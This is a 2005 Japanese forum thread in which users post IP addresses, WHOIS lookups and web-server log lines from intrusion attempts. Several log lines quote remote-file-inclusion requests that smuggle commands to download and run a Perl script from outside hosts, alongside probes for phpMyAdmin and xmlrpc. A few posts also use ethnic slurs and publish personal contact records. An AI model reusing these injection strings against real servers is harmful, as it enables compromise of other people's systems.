2 :
1 :2005/11/06(日) 16:37:27
URLの最後に余計な入ってしまった スマソ
↑余計なスペースだよ… 逝ってくるorz
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
>>216 スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
っても、池沼にゃ無理な相談か。。。
>>216 m9(^Д^)
210.150.160.253 renoir.excite.co.jp
6 :
名無しさん@お腹いっぱい。 :2005/11/06(日) 19:15:53
/⌒ヽ ⊂二二二( ^ω^)二⊃ | / ブーン ( ヽノ ノ>ノ 三 レレ
7 :
名無しさん@お腹いっぱい。 :2005/11/06(日) 21:38:17
IP 202.180.199.208 ホスト pc40208.ict.ne.jp 伊賀上野・・・忍の技には長けていないようですな
>>7 無意味とは限らん。
偽装する方法があるからといって、現実にすべて偽装されてはいない。
わざわざ偽装などしてないことの方が多いのではないか。
次スレ乙。そして3日間不正アクセスなくて珍しいと思ったらこれか。(省略部分は同じか似たようなアクセス) 2005/11/05(03:54:16) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy ) 2005/11/05(03:54:21) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:26) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:31) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:37) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:42) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:47) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:52) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:54:58) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:55:03) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:55:08) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:55:14) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:55:19) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:55:24) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) 2005/11/05(03:55:29) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy ) 2005/11/05(10:23:24) W-SV 211.95.176.67 [80] 400 0 "GET http//www.ebay.com/ HTTP/1.1" ( dummy ) 2005/11/06(20:53:39) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp(211.2.39.63) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/11/06(20:55:03) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp 2005/11/06(22:11:08) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp 2005/11/06(23:00:13) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp 2005/11/06(23:52:22) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp(211.2.39.63) [80] 302 29 "GET / HTTP/1.0" ( dummy )
それと脆弱性だろうというのは把握している。
15 :
名無しさん@お腹いっぱい。 :2005/11/07(月) 15:26:03
コイツうぜ〜 IPアドレス 59.190.125.222 ホスト名 59-190-125-222.eonet.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 光
16 :
名無しさん@お腹いっぱい。 :2005/11/07(月) 18:30:01
なんか今日多い。腹立つ。 IPアドレス 58.1.137.236 ホスト名 nttkyo331236.tkyo.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 光 IPアドレス 58.1.108.15 ホスト名 ntsitm184015.sitm.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
>>1 乙ですが、ポートも書くように付け加えとくべきでしたね。
あいかわらず何されたか書けない人多い。
IP 220.159.53.253 ホスト t553253.ipgw.phs.yoyogi.mopera.ne.jp ドコモ経由ってのは初体験だな。
2005/11/07(23:56:59) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 0 "GET /pma/main.php HTTP/1.1" ( dummy ) 2005/11/07(23:56:59) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 2005/11/07(23:57:00) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 2005/11/07(23:57:01) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 2005/11/07(23:57:01) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 2005/11/07(23:57:02) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 0 "GET /phpmyadmin/main.php HTTP/1.1" ( dummy ) 2005/11/08(02:12:59) W-SV 218.234.130.16 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//upteams.netfirms.com/fbi.gif?&cmd=cd%20/tmp;%20curl%20-O%20viperxl.wc.hu/piz;perl%20piz HTTP/1.1" ( dummy ) 2005/11/08(02:13:05) W-SV 218.234.130.16 [80] 404 2005/11/08(02:13:11) W-SV 218.234.130.16 [80] 404 2005/11/08(02:13:17) W-SV 218.234.130.16 [80] 404 2005/11/08(02:13:23) W-SV 218.234.130.16 [80] 404 2005/11/08(02:13:29) W-SV 218.234.130.16 [80] 404 0 "GET /skin/zero_vote/error.php?dir=http//upteams.netfirms.com/fbi.gif?&cmd=cd%20/tmp;%20curl%20-O%20viperxl.wc.hu/piz;perl%20piz HTTP/1.1" ( dummy )
こいつしつこい… IPアドレス 58.93.87.11 ホスト名 i58-93-87-11.s02.a012.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 xDSL
IP Address = 210.235.243.41 Host Name = ea41.opt2.point.ne.jp a. [IPネットワークアドレス] 210.235.240.0/21 b. [ネットワーク名] TEPCO-HIKARI f. [組織名] 株式会社ドリーム・トレイン・インターネット g. [Organization] DREAM TRAIN INTERNET,Inc. m. [管理者連絡窓口] MH4804JP n. [技術連絡担当者] MK10931JP p. [ネームサーバ] ns.dti.ad.jp p. [ネームサーバ] ns2.dti.ad.jp [割当年月日] 2004/11/29
2005/11/09(01:34:49) W-SV jupiter.tntonline.com(204.145.237.11) [80] 404 0 "GET /phpmyadmin/index.php HTTP/1.1" ( )
yahoobb218125122014.bbtec.net 218.125.122.14
IPアドレス 212.87.192.14 ホスト名 fw1-bcnjz0-nix.core.es.inter.net IPアドレス 割当国 ※ スペイン (ES) スペインとかこわい・・・・
5W1H
IPアドレス 200.67.92.81 ホスト名 dsl-200-67-92-81.prod-empresarial.com.mx IPアドレス 割当国 ※ メキシコ (MX) ((((;゚Д゚)))ガクガクブルブル
222.234.94.22
29 :
名無しさん@お腹いっぱい。 :2005/11/10(木) 13:42:40
P2PやってるカスどもがIP晒してどうすんだwww そりゃ海外からアタックはくるわな。 それ以外はport21,22,25,80,135,137,138,139,443,445 を防ぐかTCP/UDPのSYNフラグを全部はじけばいいだけwwwwwwwww おまえらアホすぎ
30 :
名無しさん@お腹いっぱい。 :2005/11/10(木) 20:42:32
[14:58:26] <222.187.114.2> (178,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/219.133.51.39/getimage
31 :
名無しさん@お腹いっぱい。 :2005/11/11(金) 08:34:32
20.253.253.68 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.253.240.0/20 b. [ネットワーク名] ASAHI-NET f. [組織名] 朝日ネット g. [Organization] Asahi Net m. [管理者連絡窓口] AT009JP n. [技術連絡担当者] AT009JP p. [ネームサーバ] crusader.asahi-net.or.jp p. [ネームサーバ] dns1.asahi-net.or.jp [割当年月日] 2000/04/05 [最終更新] 2004/04/14 10:00:11(JST) 上位情報 ---------- 株式会社朝日ネット (ASAHI Net,Inc.) [割り振り] 210.253.240.0/20 下位情報 ---------- 該当するデータがありません。 朝日から不正アクセス
192.168.1.11 ← 最近うざすぎ!! ノートンが反応しっぱなし!
_/i i'l,_ ./ЩY. YЩ) ノニ;;ノ ヽ;;;ニi, 人人人人人人人人人 / i i 'i < こいつ最高にアホ! 〉 ''(_ .;;''';;:, )'' 〈 Y^Y^Y^Y^Y^Y^Y^Y^ i, "ヽi"台"i/" i > :;;;i "''''i'''" i;;::: < i., ::;l :;;:;;:i:;;;:;;;: l;: ,ノ ヽ "'-::;;:;;::-'" / ヽ;;::___:;:___,,.:/ /-、''':::::'''..-''ヽ /_,, ヽ;::;ノ '" ヽ / x, ヽノヽ/ .x "'、 (.,, ,. _/ \:; .,,ノ, i 彡,,..ノ, i".,,_ミミi l┐i-7 ヽ"-iΠ // ) / \\ (_/" "'\___)
>>32 うちにもちょっと違うけど同じようなIPから何回も来るよ
まじうざい
>>32 それってアンタのルータのIPじゃないのか?
IP「 210.154.213.246 」 ホスト「 p2246-ipbf201kanazawa.ishikawa.ocn.ne.jp 」 前から突っ込んで来たが、昨日から連続して・・・ 此処まで気付かないと言う事は、御老人ユーザーか?
37 :
名無しさん@お腹いっぱい。 :2005/11/12(土) 00:10:32
偽装IPもしらんのかこのスレのうんこども
wbcc2s06.ezweb.ne.jp KDDI-TS32 UP.Browser/6.2.0.9.1 機種ってWIN32なのでしょうか
馬鹿だなぁと思っていたが、偽装じゃなくてもありえる事が発覚したので、 無線LAN周りの設定を再確認した今日この頃。
41 :
名無しさん@お腹いっぱい。 :2005/11/12(土) 22:46:03
inetnum: 203.174.64.0 - 203.174.79.255
netname: DATAHOTEL
descr: Livedoor co., Ltd.
descr: DataHotel TaskForce
country: JP
admin-c: KS62-AP
admin-c: KK110-AP
tech-c: KK110-AP
tech-c: KS62-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-LIVEDOOR
changed:
[email protected] 20010531
changed:
[email protected] 20040107
status: ALLOCATED PORTABLE
changed:
[email protected] 20040302
source: APNIC
42 :
名無しさん@お腹いっぱい。 :2005/11/12(土) 22:46:51
person: Kei Kato
nic-hdl: KK110-AP
e-mail:
[email protected] address: 2-16-9, Kabuki-cho, Shinjuku-ku, Tokyo Japan 160-0021
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
country: JP
changed:
[email protected] 20040513
mnt-by: MAINT-JP-LIVEDOOR
source: APNIC
43 :
名無しさん@お腹いっぱい。 :2005/11/12(土) 22:47:35
person: Kensaku Shimada
nic-hdl: KS62-AP
e-mail:
[email protected] address: 2-16-9, Kabuki-cho, Shinjuku-ku, Tokyo Japan 160-0021
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
country: JP
changed:
[email protected] 20040513
mnt-by: MAINT-JP-LIVEDOOR
source: APNIC
ルータのアクセスブロック履歴にある From送信元 と To宛先 どっちが攻撃側かわかりません やっぱFromの方?
自分のグローバルIPアドレス確認すればいい話
46 :
名無しさん@お腹いっぱい。 :2005/11/13(日) 23:06:44
61.177.64.110
inetnum: 61.177.0.0 - 61.177.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
mnt-routes: maint-chinanet-js
changed:
[email protected] 20020209
changed:
[email protected] 20030306
status: ALLOCATED non-PORTABLE
source: APNIC
47 :
名無しさん@お腹いっぱい。 :2005/11/13(日) 23:42:00
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 221.171.0.0/16 b. [ネットワーク名] BIGLOBE-8 f. [組織名] BIGLOBEサービス(日本電気株式会社) g. [Organization] NEC Corporation m. [管理者連絡窓口] NK032JP n. [技術連絡担当者] MK11728JP p. [ネームサーバ] ns02.mesh.ad.jp p. [ネームサーバ] ns03.mesh.ad.jp [割当年月日] 2004/02/04 [最終更新] 2004/04/12 17:47:01(JST) 上位情報 ---------- 日本電気株式会社 (NEC Corporation) [割り振り] 221.171.0.0/16 下位情報 ---------- 該当するデータがありません。
48 :
たか :2005/11/14(月) 04:23:47
個体識別番号って同じ番号の人ゎいるのでしょうか?
49 :
名無しさん@お腹いっぱい。 :2005/11/14(月) 10:07:02
224.0.0.22
50 :
名無しさん@お腹いっぱい。 :2005/11/14(月) 16:59:29
222.110.243.187 Korea 62.121.132.250 Poland rtr.biotech.krakow.pl 83.18.75.138 Poland awx138.internetdsl.tpnet.pl
ll218a.sport.jyu.fi
[15:37:13] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - - [15:37:19] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - - [15:37:20] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - - [15:37:40] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - - オランダから・・・
202.159.249.219 India port 445 を叩きに来るのってワームだっけ?
俺なら手動でも445なら叩くけど
IPアドレス 220.108.54.114 ホスト名 i220-108-54-114.s02.a012.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 xDSL
>>57 PC買って初期の状態のままなら445はあいてるだろ
OSでデフォでふさがれるようになったのはXP・SP2からだし
2005/11/16(10:40:37) W-SV 220.89.250.64 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy ) 2005/11/16(10:40:43) W-SV 220.89.250.64 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy ) 2005/11/16(10:40:49) W-SV 220.89.250.64 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy ) 2005/11/16(10:40:55) W-SV 220.89.250.64 [80] 404 0 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy ) 11/14は不正アクセスなしだったのに残念。 その他はいつもの/ GETだけだった。
28.40.138.210.wd.2iij.net [210.138.40.28] 何回アクセスしてんだよ
[15:20:17] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:19] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:20] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:21] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:26] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:28] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:29] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:30] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:31] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:32] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:33] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - [15:20:35] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - - ちぅごくしつこい
62 :
名無しさん@お腹いっぱい。 :2005/11/16(水) 23:35:13
IPアドレス 221.117.212.123 ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道
220.221.94.129 ホスト名 i220-221-94-129.s02.a012.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 xDSL
2005/11/17(06:14:55) W-SV 210.178.51.1 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy ) 2005/11/17(06:15:00) W-SV 210.178.51.1 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy ) 2005/11/17(06:15:06) W-SV 210.178.51.1 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy ) 2005/11/17(06:15:12) W-SV 210.178.51.1 [80] 404 0 "GET /zeroboard/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy ) 2005/11/17(06:15:18) W-SV 210.178.51.1 [80] 404 0 "GET /zb41/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
65 :
名無しさん@お腹いっぱい。 :2005/11/18(金) 13:57:27
58.157.163.29 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 58.157.163.0/24 b. [ネットワーク名] SUBA-468-2BD f. [組織名] 株式会社ユーズコミュニケーションズ g. [Organization] UCOM Corporation m. [管理者連絡窓口] AT047JP n. [技術連絡担当者] AT047JP p. [ネームサーバ] ns01.usen.ad.jp p. [ネームサーバ] ns02.usen.ad.jp p. [ネームサーバ] ns03.usen.ad.jp [割当年月日] 2005/06/09 [最終更新] 2005/06/09 18:12:13(JST) 上位情報 ---------- 株式会社ユーズコミュニケーションズ (U's Communications Corp.) [割り振り] 58.156.0.0/15 下位情報 ---------- 該当するデータがありません。
やぁ、このスレを見た君にとっておきのスペシャルなニュースだ
君はコンピューターウイルスをくらったことあるかい?
ウイルスはとっても危険だ、誰だって避けたい
でも2ちゃんにはそんなウイルスがしこんであるアドレスがたくさん貼ってある
その度にタイーホなんて言われるがリアル逮捕なんてほとんど無い
でもこれは立派な犯罪だ(
http://www.ss.iij4u.or.jp/~somali/web/security/obstruct.html )
これから紹介するスレは
>>1 ことID:H+tEOmVN0が確信的にウイルスを貼って
それをふんだ人を見てあざけ笑っているという、とってもファンキーなスレだ
どうだい君もID:H+tEOmVN0同じように軽い気持ちでリアル通報してみないかい?
みんながまじめに通報なんてしたら
普段やる気の無いポリスも「いっちょやってみっか」って気分になるってもんさ
おっと、そこの優しい君はID:H+tEOmVN0がかわいそうなんて思ったかい?
そんな心配、無問題
ID:H+tEOmVN0は逮捕の殿堂に入れるとウキウキワクワク
そんなに期待されたら通報するしかないじゃない
ここらでこれからの2ちゃんのために
「2ちゃんにウイルスを貼って通報されて逮捕」っていう分かりやすい前例作ろうぜ!
↓
>>1 のアドレスにはウイルスしこんであります
http://news19.2ch.net/test/read.cgi/news/1132282995/
IPアドレス 58.80.55.28 ホスト名 58x80x55x28.ap58.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光 Domain Information: [ドメイン情報] a. [ドメイン名] UCOM.NE.JP b. [ねっとわーくさーびすめい] ゆーこむねっと c. [ネットワークサービス名] ユーコムネット d. [Network Service Name] UCOM-NET k. [組織種別] ネットワークサービス l. [Organization Type] Network Service m. [登録担当者] AT047JP n. [技術連絡担当者] AT047JP p. [ネームサーバ] ns01.usen.ad.jp p. [ネームサーバ] ns02.usen.ad.jp [状態] Connected (2006/06/30) [登録年月日] 2005/06/24 [接続年月日] 2005/06/24 [最終更新] 2005/06/24 16:32:04 (JST)
[06:10:03] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:04] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:06] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:07] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:08] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:09] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:10] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:11] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:12] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:13] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:14] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:16] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - [06:10:17] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - - またkrか!!
61-26-238-188.rev.home.ne.jpからポート1433に断続的に不正アクセスが続いてまつ。氏ね。
71 :
名無しさん@お腹いっぱい。 :2005/11/19(土) 14:32:57
220.209.89.160 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.209.75.0-220.209.182.255 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) m. [管理者連絡窓口] KH071JP n. [技術連絡担当者] KN6902JP n. [技術連絡担当者] TK13654JP p. [ネームサーバ] ns1.hyper.web.ad.jp p. [ネームサーバ] ns3.hyper.web.ad.jp [割当年月日] 2003/05/08 [最終更新] 2003/12/18 17:02:51(JST) 上位情報 ---------- 富士通株式会社 (FUJITSU LIMITED) [割り振り] 220.209.0.0/16 下位情報 ---------- 該当するデータがありません。 俺のサーバも取引不能です。FMVです。
219.53.112.49
73 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 02:14:06
210.255.100.228 毎日1時間近くポート80突付いてくる
74 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 04:59:40
220.150.141.130
75 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 12:07:33
下記のIpアドレス最悪! UPX_Packed_Executableという攻撃をしてきやがった。 IPアドレス 207.217.127.78 ホスト名 update00.psp.pas.earthlink.net 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 【攻撃内容】 UPX_Packed_Executable このシグネチャは、UPX ツールを使って圧縮された PE/COFF 実行ファイルを 検出します。 UPX で圧縮された実行ファイルの存在は、これ自体が攻撃を示 すものではありませんが、例外が考えられます。 UPX ツールはトロイやマル ウェアを圧縮するのに広く使用されます。正当な商用ソフトウェアを配布する のに使用されるツールとしては、あまり一般的ではありません。 このファイル を調査し、マルウェアの構成要素となっているかどうかを確認する必要があり ます。
先週パスワードアタックをしてきたホスト 133.27.178.4 140.124.181.220 148.243.214.13dapsaisd.com.mx 161.53.201.3osijek.etfos.hr 202.30.198.233 203.198.68.237ipvpn027237.netvigator.com 204.11.16.194lnx118.onestop.net 210.219.251.113 210.52.66.62 211.106.179.139 211.43.101.132 216.20.254.14 221.117.40.5221x117x40x5.ap221.ftth.ucom.ne.jp 221.143.22.22 221.247.59.66221x247x59x66.ap221.ftth.ucom.ne.jp 58.4.140.15458x4x140x154.ap58.ftth.ucom.ne.jp 59.120.145.759-120-145-7.HINET-IP.hinet.net 67.100.66.101h-67-100-66-101.chcgilgm.covad.net 69.64.37.68 air532.startdedicated.com 70.86.67.130130.70-86-67.reverse.theplanet.com 80.108.7.100chello080108007100.36.11.vie.surfer.at 81.208.32.17081-208-32-170.ip.fastwebnet.it 84.244.0.215serv-1-0-215.lycos-vds.com 84.244.1.254serv-1-1-254.lycos-vds.com
失礼、タブだと無くなっちゃうんですね。 この1週間の間にsshのパスワードアタックをしてきたホストです 133.27.178.4 140.124.181.220 148.243.214.13 dapsaisd.com.mx 161.53.201.3 osijek.etfos.hr 202.30.198.233 203.198.68.237 ipvpn027237.netvigator.com 204.11.16.194 lnx118.onestop.net 210.219.251.113 210.52.66.62 211.106.179.139 211.43.101.132 216.20.254.14 221.117.40.5 221x117x40x5.ap221.ftth.ucom.ne.jp 221.143.22.22 221.247.59.66 221x247x59x66.ap221.ftth.ucom.ne.jp 58.4.140.154 58x4x140x154.ap58.ftth.ucom.ne.jp 59.120.145.7 59-120-145-7.HINET-IP.hinet.net 67.100.66.101 h-67-100-66-101.chcgilgm.covad.net 69.64.37.68 air532.startdedicated.com 70.86.67.130 130.70-86-67.reverse.theplanet.com 80.108.7.100 chello080108007100.36.11.vie.surfer.at 81.208.32.170 81-208-32-170.ip.fastwebnet.it 84.244.0.215 serv-1-0-215.lycos-vds.com 84.244.1.254 serv-1-1-254.lycos-vds.com
78 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 14:33:59
大人気に嫉妬。
127.0.0.1←このIPやたら「IP Spoofing」って攻撃してくるんだけど本物のクラッカー?
OrgName:Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 127.0.0.0 - 127.255.255.255
CIDR:127.0.0.0/8
NetName: LOOPBACK
NetHandle:NET-127-0-0-0-1
Parent:
NetType: IANA Special Use
Comment: Please see RFC 3330 for additional information.
RegDate:
Updated: 2002-10-14
OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail:
[email protected] OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail:
[email protected] # ARIN WHOIS database, last updated 2005-11-19 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
ふぁぁ〜眠い whoisまでやってエライ
81 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 18:16:56
82 :
名無しさん@お腹いっぱい。 :2005/11/20(日) 18:33:56
58.89.146.26
>>83 とりあえず、そこのアドレス開いてみ?
「ページを表示できません。」てなればとりあえず良し。
>>84 よくわからないけど表示できませんとなったから大丈夫?なのか
>>85 こんなのあったのか、ありがとう
何この流れ。
NetBIOS210.245.164.161NETBIOS_NS送信UDPNETBIOS_NSLocalHost NetBIOSwww.naver.co.krNETBIOS_DGM受信UDPNETBIOS_DGMLocalHost 上 割当国 ※ 香港 (HK) 下 韓国 何をされているのかわかりません。 詳しい人教えて下さい。
89 :
名無しさん@お腹いっぱい。 :2005/11/21(月) 18:14:39
吉田武仁
IP アドレス 61.121.64.13 ホスト名ntaomr032013.aomr.nt.ftth.ppp.infoweb.ne.jp しつこい
IPアドレス 221.117.212.123 ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道
IPアドレス 219.129.21.84
inetnum: 219.128.0.0 - 219.137.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed:
[email protected] 20020424
changed:
[email protected] 20041207
source: APNIC
このチョンしつこすぎ
それは、チョン ではなく チュン です
221.113.223.195 なんかこのIPの人にトロイ仕掛けられてたらしくて、 さっきまで、接続されてたみたいです。 あわててポート閉じたんだけど。 なんとか仕返しできませんか?
95 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 07:21:25
プロバイダーの管理者にログ見せて ごるあするしかないね。 踏み台にされてるだけでも、損害賠償しないといけないこともある。 「あれ」付けるか、回線にファイヤーウォールかませるといいよ。
IPアドレス 219.189.192.205 ホスト名 YahooBB219189192205.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 xDSL
97 :
名無しさん@お腹いっぱい :2005/11/22(火) 13:36:13
これに属するアドレスからの不正アクセス多く、しかも長期間。
inetnum: 61.233.40.0 - 61.233.40.255
netname: CRHbYqS
country: CN
descr: China Railcom Hebei Yangquan Subbranch
descr: Telecommunication Company
descr: Yangquan City,Shanxi Province
admin-c: LQ112-AP
tech-c: LM273-AP
status: ASSIGNED NON-PORTABLE
changed:
[email protected] 20030731
mnt-by: MAINT-CN-CRTC
source: APNIC
特に61.233.40.205はポート22でsshの口が開いていることを発見。
98 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 15:58:25
IPアドレス 58.80.55.28 ホスト名 58x80x55x28.ap58.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光 SCAN-FIN
99 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 17:12:17
210.234.206.34 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.234.206.0/24 b. [ネットワーク名] KDDI-NET f. [組織名] KDDI株式会社 g. [Organization] KDDI Corporation m. [管理者連絡窓口] JP00000127 n. [技術連絡担当者] JP00000181 p. [ネームサーバ] dns0.dion.ne.jp p. [ネームサーバ] dns10.dion.ne.jp p. [ネームサーバ] dns2.dion.ne.jp p. [ネームサーバ] ns1.neweb.ne.jp [割当年月日] 2003/01/27 [最終更新] 2005/07/27 13:53:51(JST) 上位情報 ---------- KDDI株式会社 (KDDI CORPORATION) [割り振り] 210.234.0.0/16
YahooBB221019024226.bbtec.net
IPアドレス 220.0.40.62 ホスト名 YahooBB220000040062.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 xDSL IPアドレス 61.193.77.67 ホスト名 FLH1Aac003.hyg.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 光
IP アドレス: 61.121.35.37 ポート135と445をずーーーーと狙ってきてるんですけど 日本ですかね、この鬱陶しい人
